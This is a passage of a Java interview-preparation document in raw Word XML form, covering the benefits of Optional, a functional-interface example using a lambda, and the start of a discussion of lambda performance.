    <w:p w14:paraId="6438D555" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B9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Advantages of Using Optiona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0"/>
        <w:gridCol w:w="5445"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="2BCD4F80" w14:textId="77777777" w:rsidTr="00EE1B6F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="735D061A" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B9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Benefit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52C006AF" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00CE4B9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CE4B95" w:rsidRPr="00CE4B95" w14:paraId="5AB338DD" w14:textId="77777777" w:rsidTr="00EE1B6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E6FB8DD"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void NullPointerExceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F13EE8C"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voids accidental null usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="129FF8D7" w14:textId="77777777" w:rsidTr="00EE1B6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2899657B"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mproved Readability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FD6E871"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learly states that a value </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>may</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> be absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="39BB1EF7" w14:textId="77777777" w:rsidTr="00EE1B6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E1A1604"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unctional Style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69CB5CFC"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courages use of map, filter, flatMap, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="2C9CFCEF" w14:textId="77777777" w:rsidTr="00EE1B6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A9FC764"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afer Defaults</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EB1231E"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rElse, orElseGet, and orElseThrow provide graceful fallback</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="027E8F67" w14:textId="77777777" w:rsidTr="00EE1B6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DA017CC"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leaner API Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21BD9EB7" w14:textId="77777777" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F"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gnals intent better than returning null</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B394470" w14:textId="7F321323" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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C7FD598">
          <v:rect id="_x0000_i1762" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F88FA62" w14:textId="77777777" w:rsidR="009F7CCD" w:rsidRPr="00CE4B95" w:rsidRDefault="009F7CCD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="243" w:name="_Toc196307723"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Give an example of Functional Interface in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="243"/>
    </w:p>
    <w:p w14:paraId="4F84E353" w14:textId="14D3B826" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">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Functional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is an interface that has exactly </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. These interfaces can have multiple default or static methods, but they must have just one abstract method. Functional interfaces can be used as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>target types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for lambda expressions and method references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3811D5F9" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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of a Functional Interface in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4A7DBD"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et's create a simple functional interface called Greeting that defines an abstract method sayHello.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C66BB1"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FunctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E2955"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interface Greeting {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A249F62"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void sayHello(String name);  // Abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0355F5" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D056C4C"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Default method (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341886B6"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efault void sayGoodbye() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF4CB8F"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Goodbye!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693205D0"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F15E6BC" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4641A2E6"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Static method (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F131AE8"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atic void greetMorning() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFC2FD0"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Good morning!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C3303B"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61E100A"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A5A29D8"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e above example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500437FB" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105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interface Greeting has one abstract method sayHello().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE48355" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105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also has a default method sayGoodbye() and a static method greetMorning().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758F23F9" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE4B9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1E24044">
          <v:rect id="_x0000_i1763" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F640E55" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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Using Functional Interface with Lambda Expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C86848F"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Now, you can implement this Greeting interface using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expression</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9825D6"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ain {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF04BF3"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atic void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9E6E82"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Lambda expression to implement sayHello method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C026B22"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Greeting greeting = (name) -&gt; System.out.println("Hello, " + name + "!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D4E57F" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7975136C"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lling the lambda-based method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7711B8"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greeting.sayHello("Siddhant");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EF8082" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C21CBB4"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lling the default method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57906F03"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greeting.sayGoodbye();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFFAFE3" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0B8397"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alling the static method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC3EF74"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Greeting.greetMorning();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C60671"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CF1D39A"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44F776A" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A4E763"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llo, Siddhant!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4D9E8D"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oodbye!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C85C0C"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ood morning!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097FDD27" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0953DBC4" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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lambda expression</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (name) -&gt; System.out.println("Hello, " + name + "!") provides the implementation of the abstract method sayHello().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7122A353" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105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can call </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default</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static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods from the functional interface without needing to implement them in the lambda expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E09F09" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE4B9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C83ACE">
          <v:rect id="_x0000_i1764" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C420E16"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is is a basic example. In real-world applications, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java's built-in functional interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like Function, Consumer, Predicate, and Supplier are frequently used. Let me know if you want more details on those!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C542754" w14:textId="1ED92622" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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375876D">
          <v:rect id="_x0000_i1765" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA3C0FD" w14:textId="77777777" w:rsidR="00500D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00500D6E" w:rsidP="00500D6E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F07B82" w14:textId="77777777" w:rsidR="00500D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00500D6E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="244" w:name="_Toc196307724"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Suppose you are using lambda expressions and other than lambda expressions then are we getting any performance benefits?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="244"/>
    </w:p>
    <w:p w14:paraId="09C0934A" w14:textId="396CA124" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Performance Benefits of Lambda Expressions in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDF24D9"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ile lambda expressions are a core feature of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that allows for more concise and readable code, they do </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not inherently offer significant performance improvements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> over traditional approaches (such as using anonymous </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">classes or concrete classes). However, there are certain indirect performance benefits, depending on how and where you use lambda expressions. Let's explore both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>direct</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indirect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aspects of performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A955DB0" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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Reduced Boilerplate Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F38265E" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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raditional Approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3824C0B0"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ithout lambda expressions, using anonymous inner classes (especially for interfaces with a single method) leads to more verbose code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7500DFEC"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utton button = new Button();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B6595"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utton.setOnClickListener(new OnClickListener() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D94E0EB"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23855E68"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onClick(View view) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8376C0"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Button clicked");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246F7BB8"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3E9FEC2"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22DF4C2B" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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ith Lambda Expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B79D27A"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ing a lambda expression simplifies the code by reducing the boilerplate and focusing on functionality directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8C8FC0"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utton button = new Button();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A73954A"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utton.setOnClickListener(view -&gt; System.out.println("Button clicked"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32F7DF" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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erformance Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415C047F" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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duced class size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lambda expressions eliminate the need for generating additional classes (e.g., anonymous classes) during compilation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022557DA" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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mory usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Smaller compiled bytecode means more efficient memory utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA80642"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ile this doesn't directly improve runtime performance, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
